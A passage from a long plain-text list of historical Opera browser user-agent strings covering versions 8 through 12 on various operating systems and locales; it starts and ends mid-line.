6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14\nMozilla/5.0 (Windows NT 6.0; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51\nMozilla/5.0 (Windows NT 6.0; U; ja; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.00\nMozilla/5.0 (Windows NT 6.0; U; tr; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 10.10\nMozilla/5.0 (Windows NT 6.1; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01\nMozilla/5.0 (Windows NT 6.1; U; en-GB; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.51\nMozilla/5.0 (Windows NT 6.1; U; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 11.01\nMozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9b3) Gecko/2008020514 Opera 9.5\nMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101213 Opera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01\nMozilla/5.0 (X11; Linux i686; U; en) Opera 8.52\nMozilla/5.0 (X11; Linux i686; U; en; rv:1.8.0) Gecko/20060728 Firefox/1.5.0 Opera 9.23\nMozilla/5.0 (X11; Linux i686; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.51\nMozilla/5.0 (X11; Linux x86_64; U; de; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 Opera 10.62\nMozilla/5.0 (X11; Linux x86_64; U; en; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.60\nOpera/8.00 (Windows NT 5.1; U; en)\nOpera/8.01 (Macintosh; PPC Mac OS X; U; en)\nOpera/8.01 (Macintosh; U; PPC Mac OS; en)\nOpera/8.01 (Windows NT 5.0; U; de)\nOpera/8.01 (Windows NT 5.1; U; de)\nOpera/8.01 (Windows NT 5.1; U; en)\nOpera/8.01 (Windows NT 5.1; U; fr)\nOpera/8.01 (Windows NT 5.1; U; pl)\nOpera/8.02 (Windows NT 5.1; U; de)\nOpera/8.02 (Windows NT 5.1; U; en)\nOpera/8.02 (Windows NT 5.1; U; ru)\nOpera/8.0 (Windows NT 5.1; U; en)\nOpera/8.0 (X11; Linux i686; U; cs)\nOpera/8.10 (Windows NT 5.1; U; en)\nOpera/8.50 (Windows 98; U; en)\nOpera/8.50 (Windows 98; U; ru)\nOpera/8.50 (Windows ME; U; en)\nOpera/8.50 (Windows NT 4.0; U; zh-cn)\nOpera/8.50 (Windows NT 5.0; U; de)\nOpera/8.50 (Windows NT 5.0; U; en)\nOpera/8.50 (Windows NT 5.0; U; fr)\nOpera/8.50 (Windows NT 5.1; U; de)\nOpera/8.50 (Windows NT 5.1; U; en)\nOpera/8.50 (Windows NT 5.1; U; es-ES)\nOpera/8.50 (Windows NT 5.1; U; fr)\nOpera/8.50 (Windows NT 5.1; U; pl)\nOpera/8.50 (Windows NT 5.1; U; ru)\nOpera/8.51 (FreeBSD 5.1; U; en)\nOpera/8.51 (Macintosh; PPC Mac OS X; U; de)\nOpera/8.51 (Windows 98; U; en)\nOpera/8.51 (Windows NT 5.0; U; en)\nOpera/8.51 (Windows NT 5.1; U; de)\nOpera/8.51 (Windows NT 5.1; U; en)\nOpera/8.51 (Windows NT 5.1; U; fr)\nOpera/8.51 (Windows NT 5.1; U; nb)\nOpera/8.51 (Windows NT 5.1; U; pl)\nOpera/8.51 (X11; Linux i686; U; en)\nOpera/8.51 (X11; Linux x86_64; U; en)\nOpera/8.51 (X11; U; Linux i686; en-US; rv:1.8)\nOpera/8.52 (Windows ME; U; en)\nOpera/8.52 (Windows NT 5.0; U; en)\nOpera/8.52 (Windows NT 5.1; U; en)\nOpera/8.52 (Windows NT 5.1; U; ru)\nOpera/8.52 (X11; Linux i686; U; en)\nOpera/8.52 (X11; Linux x86_64; U; en)\nOpera/8.53 (Windows 98; U; en)\nOpera/8.53 (Windows NT 5.0; U; en)\nOpera/8.53 (Windows NT 5.1; U; de)\nOpera/8.53 (Windows NT 5.1; U; en)\nOpera/8.53 (Windows NT 5.1; U; pt)\nOpera/8.53 (Windows NT 5.2; U; en)\nOpera/8.54 (Windows 98; U; en)\nOpera/8.54 (Windows NT 4.0; U; zh-cn)\nOpera/8.54 (Windows NT 5.0; U; de)\nOpera/8.54 (Windows NT 5.0; U; en)\nOpera/8.54 (Windows NT 5.1; U; en)\nOpera/8.54 (Windows NT 5.1; U; pl)\nOpera/8.54 (Windows NT 5.1; U; ru)\nOpera/8.54 (X11; Linux i686; U; de)\nOpera/8.54 (X11; Linux i686; U; pl)\nOpera/9.00 (Macintosh; PPC Mac OS X; U; es)\nOpera/9.00 (Windows NT 5.0; U; en)\nOpera/9.00 (Windows NT 5.1; U; de)\nOpera/9.00 (Windows NT 5.1; U; en)\nOpera/9.00 (Windows NT 5.1; U; es-es)\nOpera/9.00 (Windows NT 5.1; U; fi)\nOpera/9.00 (Windows NT 5.1; U; fr)\nOpera/9.00 (Windows NT 5.1; U; it)\nOpera/9.00 (Windows NT 5.1; U; ja)\nOpera/9.00 (Windows NT 5.1; U; nl)\nOpera/9.00 (Windows NT 5.1; U; pl)\nOpera/9.00 (Windows NT 5.1; U; ru)\nOpera/9.00 (Windows NT 5.2; U; en)\nOpera/9.00 (Windows NT 5.2; U; pl)\nOpera/9.00 (Windows NT 5.2; U; ru)\nOpera/9.00 (Windows; U)\nOpera/9.00 (X11; Linux i686; U; de)\nOpera/9.00 (X11; Linux i686; U; en)\nOpera/9.00 (X11; Linux i686; U; pl)\nOpera/9.01 (Macintosh; PPC Mac OS X; U; en)\nOpera/9.01 (Macintosh; PPC Mac OS X; U; it)\nOpera/9.01 (Windows NT 5.0; U; de)\nOpera/9.01 (Windows NT 5.0; U; en)\nOpera/9.01 (Windows NT 5.1)\nOpera/9.01 (Windows NT 5.1; U; bg)\nOpera/9.01 (Windows NT 5.1; U; cs)\nOpera/9.01 (Windows NT 5.1; U; da)\nOpera/9.01 (Windows NT 5.1; U; de)\nOpera/9.01 (Windows NT 5.1; U; en)\nOpera/9.01 (Windows NT 5.1; U; es-es)\nOpera/9.01 (Windows NT 5.1; U; ja)\nOpera/9.01 (Windows NT 5.1; U; pl)\nOpera/9.01 (Windows NT 5.1; U; ru)\nOpera/9.01 (Windows NT 5.2; U; en)\nOpera/9.01 (Windows NT 5.2; U; ru)\nOpera/9.01 (X11; FreeBSD 6 i386; U; en)\nOpera/9.01 (X11; FreeBSD 6 i386; U;pl)\nOpera/9.01 (X11; Linux i686; U; en)\nOpera/9.01 (X11; OpenBSD i386; U; en)\nOpera/9.02 (Windows NT 5.0; U; en)\nOpera/9.02 (Windows NT 5.0; U; pl)\nOpera/9.02 (Windows NT 5.0; U; sv)\nOpera/9.02 (Windows NT 5.1; U; de)\nOpera/9.02 (Windows NT 5.1; U; en)\nOpera/9.02 (Windows NT 5.1; U; fi)\nOpera/9.02 (Windows NT 5.1; U; ja)\nOpera/9.02 (Windows NT 5.1; U; nb)\nOpera/9.02 (Windows NT 5.1; U; pl)\nOpera/9.02 (Windows NT 5.1; U; pt-br)\nOpera/9.02 (Windows NT 5.1; U; ru)\nOpera/9.02 (Windows NT 5.1; U; zh-cn)\nOpera/9.02 (Windows NT 5.2; U; de)\nOpera/9.02 (Windows NT 5.2; U; en)\nOpera/9.02 (Windows; U; nl)\nOpera/9.02 (Windows XP; U; ru)\nOpera/9.02 (X11; Linux i686; U; de)\nOpera/9.02 (X11; Linux i686; U; en)\nOpera/9.02 (X11; Linux i686; U; hu)\nOpera/9.02 (X11; Linux i686; U; pl)\nOpera/9.10 (Windows NT 5.1; U; es-es)\nOpera/9.10 (Windows NT 5.1; U; fi)\nOpera/9.10 (Windows NT 5.1; U; hu)\nOpera/9.10 (Windows NT 5.1; U; it)\nOpera/9.10 (Windows NT 5.1; U; nl)\nOpera/9.10 (Windows NT 5.1; U; pl)\nOpera/9.10 (Windows NT 5.1; U; pt)\nOpera/9.10 (Windows NT 5.1; U; sv)\nOpera/9.10 (Windows NT 5.1; U; zh-tw)\nOpera/9.10 (Windows NT 5.2; U; de)\nOpera/9.10 (Windows NT 5.2; U; en)\nOpera/9.10 (Windows NT 6.0; U; en)\nOpera/9.10 (Windows NT 6.0; U; it-IT)\nOpera/9.10 (X11; Linux i386; U; en)\nOpera/9.10 (X11; Linux i686; U; en)\nOpera/9.10 (X11; Linux i686; U; kubuntu;pl)\nOpera/9.10 (X11; Linux i686; U; pl)\nOpera/9.10 (X11; Linux; U; en)\nOpera/9.10 (X11; Linux x86_64; U; en)\nOpera/9.12 (Windows NT 5.0; U)\nOpera/9.12 (Windows NT 5.0; U; ru)\nOpera/9.12 (X11; Linux i686; U; en) (Ubuntu)\nOpera/9.20 (Windows NT 5.1; U; en)\nOpera/9.20(Windows NT 5.1; U; en)\nOpera/9.20 (Windows NT 5.1; U; es-AR)\nOpera/9.20 (Windows NT 5.1; U; es-es)\nOpera/9.20 (Windows NT 5.1; U; it)\nOpera/9.20 (Windows NT 5.1; U; nb)\nOpera/9.20 (Windows NT 5.1; U; zh-tw)\nOpera/9.20 (Windows NT 5.2; U; en)\nOpera/9.20 (Windows NT 6.0; U; de)\nOpera/9.20 (Windows NT 6.0; U; en)\nOpera/9.20 (Windows NT 6.0; U; es-es)\nOpera/9.20 (X11; Linux i586; U; en)\nOpera/9.20 (X11; Linux i686; U; en)\nOpera/9.20 (X11; Linux i686; U; es-es)\nOpera/9.20 (X11; Linux i686; U; pl)\nOpera/9.20 (X11; Linux i686; U; ru)\nOpera/9.20 (X11; Linux i686; U; tr)\nOpera/9.20 (X11; Linux x86_64; U; en)\nOpera/9.21 (Macintosh; Intel Mac OS X; U; en)\nOpera/9.21 (Macintosh; PPC Mac OS X; U; en)\nOpera/9.21 (Windows 98; U; en)\nOpera/9.21 (Windows NT 5.0; U; de)\nOpera/9.21 (Windows NT 5.1; U; de)\nOpera/9.21 (Windows NT 5.1; U; en)\nOpera/9.21 (Windows NT 5.1; U; fr)\nOpera/9.21 (Windows NT 5.1; U; nl)\nOpera/9.21 (Windows NT 5.1; U; pl)\nOpera/9.21 (Windows NT 5.1; U; pt-br)\nOpera/9.21 (Windows NT 5.1; U; ru)\nOpera/9.21 (Windows NT 5.2; U; en)\nOpera/9.21 (Windows NT 6.0; U; en)\nOpera/9.21 (Windows NT 6.0; U; nb)\nOpera/9.21 (X11; Linux i686; U; de)\nOpera/9.21 (X11; Linux i686; U; en)\nOpera/9.21 (X11; Linux i686; U; es-es)\nOpera/9.21 (X11; Linux x86_64; U; en)\nOpera/9.22 (Windows NT 5.1; U; en)\nOpera/9.22 (Windows NT 5.1; U; fr)\nOpera/9.22 (Windows NT 5.1; U; pl)\nOpera/9.22 (Windows NT 6.0; U; en)\nOpera/9.22 (Windows NT 6.0; U; ru)\nOpera/9.22 (X11; Linux i686; U; de)\nOpera/9.22 (X11; Linux i686; U; en)\nOpera/9.22 (X11; OpenBSD i386; U; en)\nOpera/9.23 (Macintosh; Intel Mac OS X; U; ja)\nOpera/9.23 (Mac OS X; fr)\nOpera/9.23 (Mac OS X; ru)\nOpera/9.23 (Windows NT 5.0; U; de)\nOpera/9.23 (Windows NT 5.0; U; en)\nOpera/9.23 (Windows NT 5.1; U; da)\nOpera/9.23 (Windows NT 5.1; U; de)\nOpera/9.23 (Windows NT 5.1; U; en)\nOpera/9.23 (Windows NT 5.1; U; fi)\nOpera/9.23 (Windows NT 5.1; U; it)\nOpera/9.23 (Windows NT 5.1; U; ja)\nOpera/9.23 (Windows NT 5.1; U; pt)\nOpera/9.23 (Windows NT 5.1; U; zh-cn)\nOpera/9.23 (Windows NT 6.0; U; de)\nOpera/9.23 (X11; Linux i686; U; en)\nOpera/9.23 (X11; Linux i686; U; es-es)\nOpera/9.23 (X11; Linux x86_64; U; en)\nOpera/9.24 (Macintosh; PPC Mac OS X; U; en)\nOpera/9.24 (Windows NT 5.0; U; ru)\nOpera/9.24 (Windows NT 5.1; U; ru)\nOpera/9.24 (Windows NT 5.1; U; tr)\nOpera/9.24 (X11; Linux i686; U; de)\nOpera/9.24 (X11; SunOS i86pc; U; en)\nOpera/9.25 (Macintosh; Intel Mac OS X; U; en)\nOpera/9.25 (Macintosh; PPC Mac OS X; U; en)\nOpera/9.25 (OpenSolaris; U; en)\nOpera/9.25 (Windows NT 4.0; U; en)\nOpera/9.25 (Windows NT 5.0; U; cs)\nOpera/9.25 (Windows NT 5.0; U; en)\nOpera/9.25 (Windows NT 5.1; U; de)\nOpera/9.25 (Windows NT 5.1; U; lt)\nOpera/9.25 (Windows NT 5.1; U; ru)\nOpera/9.25 (Windows NT 5.1; U; zh-cn)\nOpera/9.25 (Windows NT 5.2; U; en)\nOpera/9.25 (Windows NT 6.0; U; en-US)\nOpera/9.25 (Windows NT 6.0; U; ru)\nOpera/9.25 (Windows NT 6.0; U; sv)\nOpera/9.25 (X11; Linux i686; U; en)\nOpera/9.25 (X11; Linux i686; U; fr)\nOpera/9.25 (X11; Linux i686; U; fr-ca)\nOpera/9.26 (Macintosh; PPC Mac OS X; U; en)\nOpera/9.26 (Windows NT 5.1; U; de)\nOpera/9.26 (Windows NT 5.1; U; nl)\nOpera/9.26 (Windows NT 5.1; U; pl)\nOpera/9.26 (Windows NT 5.1; U; zh-cn)\nOpera/9.26 (Windows; U; pl)\nOpera/9.27 (Macintosh; Intel Mac OS X; U; sv)\nOpera/9.27 (Windows NT 5.1; U; ja)\nOpera/9.27 (Windows NT 5.2; U; en)\nOpera/9.27 (X11; Linux i686; U; en)\nOpera/9.27 (X11; Linux i686; U; fr)\nOpera/9.4 (Windows NT 5.3; U; en)\nOpera/9.4 (Windows NT 6.1; U; en)\nOpera/9.50 (Macintosh; Intel Mac OS X; U; de)\nOpera/9.50 (Macintosh; Intel Mac OS X; U; en)\nOpera/9.50 (Windows NT 5.1; U; es-ES)\nOpera/9.50 (Windows NT 5.1; U; it)\nOpera/9.50 (Windows NT 5.1; U; nl)\nOpera/9.50 (Windows NT 5.1; U; nn)\nOpera/9.50 (Windows NT 5.1; U; ru)\nOpera/9.50 (Windows NT 5.2; U; it)\nOpera/9.50 (X11; Linux i686; U; es-ES)\nOpera/9.50 (X11; Linux x86_64; U; nb)\nOpera/9.50 (X11; Linux x86_64; U; pl)\nOpera/9.51 (Macintosh; Intel Mac OS X; U; en)\nOpera/9.51 (Windows NT 5.1; U; da)\nOpera/9.51 (Windows NT 5.1; U; en)\nOpera/9.51 (Windows NT 5.1; U; en-GB)\nOpera/9.51 (Windows NT 5.1; U; es-AR)\nOpera/9.51 (Windows NT 5.1; U; es-LA)\nOpera/9.51 (Windows NT 5.1; U; fr)\nOpera/9.51 (Windows NT 5.1; U; nn)\nOpera/9.51 (Windows NT 5.2; U; en)\nOpera/9.51 (Windows NT 6.0; U; en)\nOpera/9.51 (Windows NT 6.0; U; es)\nOpera/9.51 (Windows NT 6.0; U; sv)\nOpera/9.51 (X11; Linux i686; U; de)\nOpera/9.51 (X11; Linux i686; U; fr)\nOpera/9.51 (X11; Linux i686; U; Linux Mint; en)\nOpera/9.52 (Macintosh; Intel Mac OS X; U; pt)\nOpera/9.52 (Macintosh; Intel Mac OS X; U; pt-BR)\nOpera/9.52 (Macintosh; PPC Mac OS X; U; fr)\nOpera/9.52 (Macintosh; PPC Mac OS X; U; ja)\nOpera/9.52 (Windows NT 5.0; U; en)\nOpera/9.52 (Windows NT 5.2; U; ru)\nOpera/9.52 (Windows NT 6.0; U; de)\nOpera/9.52 (Windows NT 6.0; U; en)\nOpera/9.52 (Windows NT 6.0; U; fr)\nOpera/9.52 (Windows NT 6.0; U; Opera/9.52 (X11; Linux x86_64; U); en)\nOpera/9.52 (X11; Linux i686; U; cs)\nOpera/9.52 (X11; Linux i686; U; en)\nOpera/9.52 (X11; Linux i686; U; fr)\nOpera/9.52 (X11; Linux x86_64; U)\nOpera/9.52 (X11; Linux x86_64; U; en)\nOpera/9.52 (X11; Linux x86_64; U; ru)\nOpera/9.5 (Windows NT 5.1; U; fr)\nOpera/9.5 (Windows NT 6.0; U; en)\nOpera/9.60 (Windows NT 5.0; U; en) Presto/2.1.1\nOpera/9.60 (Windows NT 5.1; U; en-GB) Presto/2.1.1\nOpera/9.60 (Windows NT 5.1; U; es-ES) Presto/2.1.1\nOpera/9.60 (Windows NT 5.1; U; sv) Presto/2.1.1\nOpera/9.60 (Windows NT 5.1; U; tr) Presto/2.1.1\nOpera/9.60 (Windows NT 6.0; U; bg) Presto/2.1.1\nOpera/9.60 (Windows NT 6.0; U; de) Presto/2.1.1\nOpera/9.60 (Windows NT 6.0; U; pl) Presto/2.1.1\nOpera/9.60 (Windows NT 6.0; U; ru) Presto/2.1.1\nOpera/9.60 (Windows NT 6.0; U; uk) Presto/2.1.1\nOpera/9.60 (X11; Linux i686; U; en-GB) Presto/2.1.1\nOpera/9.60 (X11; Linux i686; U; ru) Presto/2.1.1\nOpera/9.60 (X11; Linux x86_64; U)\nOpera/9.61 (Macintosh; Intel Mac OS X; U; de) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; cs) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; de) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; en-GB) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; en) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; fr) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; ru) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; zh-cn) Presto/2.1.1\nOpera/9.61 (Windows NT 5.1; U; zh-tw) Presto/2.1.1\nOpera/9.61 (Windows NT 5.2; U; en) Presto/2.1.1\nOpera/9.61 (Windows NT 6.0; U; en) Presto/2.1.1\nOpera/9.61 (Windows NT 6.0; U; http://lucideer.com; en-GB) Presto/2.1.1\nOpera/9.61 (Windows NT 6.0; U; pt-BR) Presto/2.1.1\nOpera/9.61 (Windows NT 6.0; U; ru) Presto/2.1.1\nOpera/9.61 (X11; Linux i686; U; de) Presto/2.1.1\nOpera/9.61 (X11; Linux i686; U; en) Presto/2.1.1\nOpera/9.61 (X11; Linux i686; U; pl) Presto/2.1.1\nOpera/9.61 (X11; Linux i686; U; ru) Presto/2.1.1\nOpera/9.61 (X11; Linux x86_64; U; fr) Presto/2.1.1\nOpera/9.62 (Windows NT 5.1; U; pt-BR) Presto/2.1.1\nOpera/9.62 (Windows NT 5.1; U; ru) Presto/2.1.1\nOpera/9.62 (Windows NT 5.1; U; tr) Presto/2.1.1\nOpera/9.62 (Windows NT 5.1; U; zh-cn) Presto/2.1.1\nOpera/9.62 (Windows NT 5.1; U; zh-tw) Presto/2.1.1\nOpera/9.62 (Windows NT 5.2; U; en) Presto/2.1.1\nOpera/9.62 (Windows NT 6.0; U; de) Presto/2.1.1\nOpera/9.62 (Windows NT 6.0; U; en-GB) Presto/2.1.1\nOpera/9.62 (Windows NT 6.0; U; en) Presto/2.1.1\nOpera/9.62 (Windows NT 6.0; U; nb) Presto/2.1.1\nOpera/9.62 (Windows NT 6.0; U; pl) Presto/2.1.1\nOpera/9.62 (Windows NT 6.1; U; de) Presto/2.1.1\nOpera/9.62 (Windows NT 6.1; U; en) Presto/2.1.1\nOpera/9.62 (X11; Linux i686; U; en) Presto/2.1.1\nOpera/9.62 (X11; Linux i686; U; fi) Presto/2.1.1\nOpera/9.62 (X11; Linux i686; U; it) Presto/2.1.1\nOpera/9.62 (X11; Linux i686; U; Linux Mint; en) Presto/2.1.1\nOpera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1\nOpera/9.62 (X11; Linux x86_64; U; en_GB, en_US) Presto/2.1.1\nOpera/9.62 (X11; Linux x86_64; U; ru) Presto/2.1.1\nOpera/9.63 (Windows NT 5.1; U; pt-BR) Presto/2.1.1\nOpera/9.63 (Windows NT 5.2; U; de) Presto/2.1.1\nOpera/9.63 (Windows NT 5.2; U; en) Presto/2.1.1\nOpera/9.63 (Windows NT 6.0; U; cs) Presto/2.1.1\nOpera/9.63 (Windows NT 6.0; U; en) Presto/2.1.1\nOpera/9.63 (Windows NT 6.0; U; fr) Presto/2.1.1\nOpera/9.63 (Windows NT 6.0; U; nb) Presto/2.1.1\nOpera/9.63 (Windows NT 6.0; U; pl) Presto/2.1.1\nOpera/9.63 (Windows NT 6.1; U; de) Presto/2.1.1\nOpera/9.63 (Windows NT 6.1; U; en) Presto/2.1.1\nOpera/9.63 (Windows NT 6.1; U; hu) Presto/2.1.1\nOpera/9.63 (X11; FreeBSD 7.1-RELEASE i386; U; en) Presto/2.1.1\nOpera/9.63 (X11; Linux i686)\nOpera/9.63 (X11; Linux i686; U; de) Presto/2.1.1\nOpera/9.63 (X11; Linux i686; U; en)\nOpera/9.63 (X11; Linux i686; U; nb) Presto/2.1.1\nOpera/9.63 (X11; Linux i686; U; ru)\nOpera/9.63 (X11; Linux i686; U; ru) Presto/2.1.1\nOpera/9.63 (X11; Linux x86_64; U; cs) Presto/2.1.1\nOpera/9.63 (X11; Linux x86_64; U; ru) Presto/2.1.1\nOpera/9.64(Windows NT 5.1; U; en) Presto/2.1.1\nOpera/9.64 (Windows NT 6.0; U; pl) Presto/2.1.1\nOpera/9.64 (Windows NT 6.0; U; zh-cn) Presto/2.1.1\nOpera/9.64 (Windows NT 6.1; U; de) Presto/2.1.1\nOpera/9.64 (Windows NT 6.1; U; MRA 5.5 (build 02842); ru) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; da) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; de) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; en) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; Linux Mint; it) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; Linux Mint; nb) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; nb) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; pl) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; sv) Presto/2.1.1\nOpera/9.64 (X11; Linux i686; U; tr) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; cs) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; de) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; en-GB) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; en) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; hr) Presto/2.1.1\nOpera/9.64 (X11; Linux x86_64; U; pl) Presto/2.1.1\nOpera 9.7 (Windows NT 5.2; U; en)\nOpera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15\nOpera/9.80 (Linux i686; U; en) Presto/2.5.22 Version/10.51\nOpera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; de) Presto/2.9.168 Version/11.52\nOpera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\nOpera/9.80 (Macintosh; Intel Mac OS X; U; nl) Presto/2.6.30 Version/10.61\nOpera/9.80 (S60; SymbOS; Opera Tablet/9174; U; en) Presto/2.7.81 Version/10.5\nOpera/9.80 (Windows 98; U; de) Presto/2.6.30 Version/10.61\nOpera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.10\nOpera/9.80 (Windows NT 5.1; U; cs) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 5.1; U; de) Presto/2.2.15 Version/10.10\nOpera/9.80 (Windows NT 5.1; U; en) Presto/2.9.168 Version/11.51\nOpera/9.80 (Windows NT 5.1; U; it) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 5.1; U; MRA 5.5 (build 02842); ru) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 5.1; U; MRA 5.6 (build 03278); ru) Presto/2.6.30 Version/10.63\nOpera/9.80 (Windows NT 5.1; U; pl) Presto/2.6.30 Version/10.62\nOpera/9.80 (Windows NT 5.1; U;) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 5.1; U; ru) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 5.1; U; ru) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 5.1; U; ru) Presto/2.7.39 Version/11.00\nOpera/9.80 (Windows NT 5.1; U; sk) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00\nOpera/9.80 (Windows NT 5.1; U; zh-tw) Presto/2.8.131 Version/11.10\nOpera/9.80 (Windows NT 5.2; U; en) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 5.2; U; en) Presto/2.6.30 Version/10.63\nOpera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51\nOpera/9.80 (Windows NT 5.2; U; ru) Presto/2.6.30 Version/10.61\nOpera/9.80 (Windows NT 5.2; U; ru) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 5.2; U; zh-cn) Presto/2.6.30 Version/10.63\nOpera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14\nOpera/9.80 (Windows NT 6.0; U; cs) Presto/2.5.22 Version/10.51\nOpera/9.80 (Windows NT 6.0; U; de) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.0; U; en) Presto/2.2.15 Version/10.10\nOpera/9.80 (Windows NT 6.0; U; en) Presto/2.7.39 Version/11.00\nOpera/9.80 (Windows NT 6.0; U; en) Presto/2.8.99 Version/11.10\nOpera/9.80 (Windows NT 6.0; U; Gecko/20100115; pl) Presto/2.2.15 Version/10.10\nOpera/9.80 (Windows NT 6.0; U; it) Presto/2.6.30 Version/10.61\nOpera/9.80 (Windows NT 6.0; U; nl) Presto/2.6.30 Version/10.60\nOpera/9.80 (Windows NT 6.0; U; pl) Presto/2.10.229 Version/11.62\nOpera/9.80 (Windows NT 6.0; U; pl) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.0; U; zh-cn) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 6.1; Opera Tablet/15165; U; en) Presto/2.8.149 Version/11.1\nOpera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.1; U; cs) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.1; U; de) Presto/2.2.15 Version/10.10\nOpera/9.80 (Windows NT 6.1; U; en-GB) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 6.1; U; en) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.1; U; en) Presto/2.5.22 Version/10.51\nOpera/9.80 (Windows NT 6.1; U; en) Presto/2.6.30 Version/10.61\nOpera/9.80 (Windows NT 6.1; U; en-US) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00\nOpera/9.80 (Windows NT 6.1; U; fi) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.1; U; fi) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 6.1; U; fr) Presto/2.5.24 Version/10.52\nOpera/9.80 (Windows NT 6.1; U; ja) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 6.1; U; ko) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 6.1; U; pl) Presto/2.6.31 Version/10.70\nOpera/9.80 (Windows NT 6.1; U; pl) Presto/2.7.62 Version/11.00\nOpera/9.80 (Windows NT 6.1; U; sk) Presto/2.6.22 Version/10.50\nOpera/9.80 (Windows NT 6.1; U; sv) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.2.15 Version/10.00\nOpera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.30 Version/10.61\nOpera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.6.37 Version/11.00\nOpera/9.80 (Windows NT 6.1; U; zh-cn) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.5.22 Version/10.50\nOpera/9.80 (Windows NT 6.1; U; zh-tw) Presto/2.7.62 Version/11.01\nOpera/9.80 (Windows NT 6.1; WOW64; U; pt) Presto/2.10.229 Version/11.62\nOpera/9.80 (Windows NT 6.1 x64; U; en) Presto/2.7.62 Version/11.00\nOpera/9.80 (X11; Linux i686; Ubuntu/14.10) Presto/2.12.388 Version/12.16\nOpera/9.80 (X11; Linux i686; U; Debian; pl) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; de) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; en-GB) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; en-GB) Presto/2.5.24 Version/10.53\nOpera/9.80 (X11; Linux i686; U; en) Presto/2.2.15 Version/10.00\nOpera/9.80 (X11; Linux i686; U; en) Presto/2.5.27 Version/10.60\nOpera/9.80 (X11; Linux i686; U; es-ES) Presto/2.6.30 Version/10.61\nOpera/9.80 (X11; Linux i686; U; es-ES) Presto/2.8.131 Version/11.11\nOpera/9.80 (X11; Linux i686; U; fr) Presto/2.7.62 Version/11.01\nOpera/9.80 (X11; Linux i686; 